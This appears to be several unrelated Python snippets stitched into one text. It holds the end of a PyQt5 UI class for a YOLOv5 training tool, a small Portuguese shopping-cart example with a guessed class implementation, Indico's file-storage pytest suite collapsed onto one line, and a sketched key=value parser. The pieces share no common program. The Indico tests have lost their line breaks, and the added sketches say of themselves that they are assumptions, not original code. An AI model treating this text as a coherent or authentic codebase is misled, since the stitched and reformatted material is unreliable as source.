self.browseConda.setText(_translate("Yolov5TrainGuide", "Browse")) self.label_9.setText(_translate("Yolov5TrainGuide", "YOLOv5 Train Guide Tool"))
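# Ui_Yolov5TrainGuide above is pyuic5-generated and only builds the widgets;
# a host widget is expected to instantiate it and call setupUi(), following
# the usual PyQt5 pattern sketched below (illustrative only).
if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    window = QtWidgets.QWidget()
    ui = Ui_Yolov5TrainGuide()
    ui.setupUi(window)
    window.show()
    sys.exit(app.exec_())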
from classes import Produto, Carrinho_Compra

camisa = Produto('Camiseta', 50)
calca = Produto('Tenis', 40)

carrinho = Carrinho_Compra()
carrinho.adiciona(camisa)
carrinho.adiciona(calca)
carrinho.mostra()
print(carrinho.total())
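# The 'classes' module used above is not included here. A minimal sketch of
# Produto and Carrinho_Compra that would be consistent with this usage might
# look like the following (an assumption, not the original implementation):
class Produto:
    def __init__(self, nome, preco):
        self.nome = nome
        self.preco = preco

class Carrinho_Compra:
    def __init__(self):
        self.produtos = []

    def adiciona(self, produto):
        # add one product to the cart
        self.produtos.append(produto)

    def mostra(self):
        # print every product currently in the cart
        for produto in self.produtos:
            print(produto.nome, produto.preco)

    def total(self):
        # sum of all product prices
        return sum(produto.preco for produto in self.produtos)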
# This file is part of Indico. # Copyright (C) 2002 - 2021 CERN # # Indico is free software; you can redistribute it and/or # modify it under the terms of the MIT License; see the # LICENSE file for more details. from __future__ import unicode_literals import os from io import BytesIO import pytest from indico.core.storage import (FileSystemStorage, ReadOnlyFileSystemStorage, Storage, StorageError, StorageReadOnlyError) @pytest.fixture def fs_storage(tmpdir): return FileSystemStorage(tmpdir.strpath) @pytest.mark.parametrize('data', ('foo', 'foo=bar,', ',')) def test_parse_data_invalid(data): with pytest.raises(ValueError): Storage(None)._parse_data(data) @pytest.mark.parametrize(('data', 'expected'), ( ('foo=bar', {'foo': 'bar'}), ('foo = bar', {'foo': 'bar'}), ('foo = bar, hello= world ', {'foo': 'bar', 'hello': 'world'}), ('test=123,test2=True', {'test': '123', 'test2': 'True'}), )) def test_parse_data(data, expected): assert Storage(None)._parse_data(data) == expected @pytest.mark.usefixtures('request_context') def test_fs_errors(fs_storage): with pytest.raises(StorageError) as exc_info: fs_storage.open('xxx') assert 'Could not open' in unicode(exc_info.value) with pytest.raises(StorageError) as exc_info: fs_storage.send_file('xxx', 'unused/unused', 'unused') assert 'Could not send' in unicode(exc_info.value) with pytest.raises(StorageError) as exc_info: fs_storage.delete('xxx') assert 'Could not delete' in unicode(exc_info.value) with pytest.raises(StorageError) as exc_info: fs_storage.getsize('xxx') assert 'Could not get size' in unicode(exc_info.value) with pytest.raises(StorageError) as exc_info: fs_storage.open('../xxx') assert 'Invalid path' in unicode(exc_info.value) os.mkdir(fs_storage._resolve_path('secret'), 0o000) with pytest.raises(StorageError) as exc_info: fs_storage.save('secret/test.txt', 'unused/unused', 'unused', b'hello test') assert 'Could not save' in unicode(exc_info.value) os.rmdir(fs_storage._resolve_path('secret')) def test_fs_save_bytes(fs_storage): f, __ = fs_storage.save('test.txt', 'unused/unused', 'unused', b'hello test') assert fs_storage.open(f).read() == b'hello test' def test_fs_save_fileobj(fs_storage): f, __ = fs_storage.save('test.txt', 'unused/unused', 'unused', BytesIO(b'hello test')) assert fs_storage.open(f).read() == b'hello test' def test_fs_overwrite(fs_storage): f, __ = fs_storage.save('test.txt', 'unused/unused', 'unused', b'hello test') with pytest.raises(StorageError) as exc_info: fs_storage.save('test.txt', 'unused/unused', 'unused', b'hello fail') assert 'already exists' in unicode(exc_info.value) with fs_storage.open(f) as fd: assert fd.read() == b'hello test' def test_fs_dir(fs_storage): fs_storage.save('foo/test.txt', 'unused/unused', 'unused', b'hello test') # Cannot open directory with pytest.raises(StorageError) as exc_info: fs_storage.open('foo') assert 'Could not open' in unicode(exc_info.value) # Cannot create file colliding with the directory with pytest.raises(StorageError) as exc_info: fs_storage.save('foo', 'unused/unused', 'unused', b'hello test') assert 'Could not save' in unicode(exc_info.value) def test_fs_operations(fs_storage): f1, h1 = fs_storage.save('foo/bar/test.txt', 'unused/unused', 'unused', b'hello world') f2, h2 = fs_storage.save('foo/bar/test2.txt', 'unused/unused', 'unused', b'hello there') f3, h3 = fs_storage.save('test.txt', 'unused/unused', 'unused', b'very very long file' * 1024 * 1024) # check md5 checksums assert h1 == u'5eb63bbbe01eeed093cb22bb8f5acdc3' assert h2 == u'161bc25962da8fed6d2f59922fb642aa' 
assert h3 == u'd35ddfd803cbe8915f5c3ecd1d0523b4' with fs_storage.open(f1) as fd: assert fd.read() == b'hello world' with fs_storage.open(f2) as fd: assert fd.read() == b'hello there' with fs_storage.open(f3) as fd: assert len(fd.read()) == 19922944 assert fs_storage.getsize(f1) == 11 fs_storage.delete(f1) # only f1 should have been deleted with pytest.raises(StorageError): fs_storage.open(f1) with fs_storage.open(f2) as fd: assert fd.read() == b'hello there' with fs_storage.open(f3) as fd: assert len(fd.read()) == 19922944 @pytest.mark.usefixtures('request_context') def test_fs_send_file(fs_storage): f1, __ = fs_storage.save('foo/bar/test.txt', 'unused/unused', 'unused', b'hello world') response = fs_storage.send_file(f1, 'text/plain', 'filename.txt') assert 'text/plain' in response.headers['Content-type'] assert 'filename.txt' in response.headers['Content-disposition'] assert ''.join(response.response) == 'hello world' @pytest.mark.usefixtures('request_context') def test_fs_readonly(fs_storage): f, __ = fs_storage.save('test.txt', 'unused/unused', 'unused', b'hello world') readonly = ReadOnlyFileSystemStorage(fs_storage.path) assert readonly.open(f).read() == b'hello world' assert readonly.send_file(f, 'test/plain', 'test.txt') assert readonly.getsize(f) == 11 with pytest.raises(StorageReadOnlyError): readonly.delete(f) with pytest.raises(StorageReadOnlyError): readonly.save('test2.txt', 'unused/unused', 'unused', b'hello fail') # just to make sure the file is still there assert readonly.open(f).read() == b'hello world' def test_fs_get_local_path(fs_storage): f, __ = fs_storage.save('test.txt', 'unused/unused', 'unused', b'hello world') with fs_storage.get_local_path(f) as path: assert path == fs_storage._resolve_path(f) with open(path, 'rb') as fd: assert fd.read() == b'hello world' # fs storage returns the real path so it should still exist afterwards assert os.path.exists(path) def test_storage_get_local_path(fs_storage): class CustomStorage(FileSystemStorage): def get_local_path(self, file_id): return Storage.get_local_path(self, file_id) storage = CustomStorage(fs_storage.path) f, __ = storage.save('test.txt', 'unused/unused', 'unused', b'hello world') with storage.get_local_path(f) as path: with open(path, 'rb') as fd: assert fd.read() == b'hello world' assert not os.path.exists(path)
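# A minimal sketch of a key=value parser consistent with the _parse_data tests
# above: comma-separated pairs, surrounding whitespace trimmed, ValueError on
# malformed input. This is an illustration, not Indico's actual implementation.
def parse_data(data):
    result = {}
    for part in data.split(','):
        key, sep, value = part.partition('=')
        if not sep or not key.strip() or not value.strip():
            raise ValueError('Invalid key/value pair: {}'.format(part))
        result[key.strip()] = value.strip()
    return result

# parse_data('foo = bar, hello= world ') == {'foo': 'bar', 'hello': 'world'}
# parse_data('foo=bar,') raises ValueError (the trailing comma yields an empty pair)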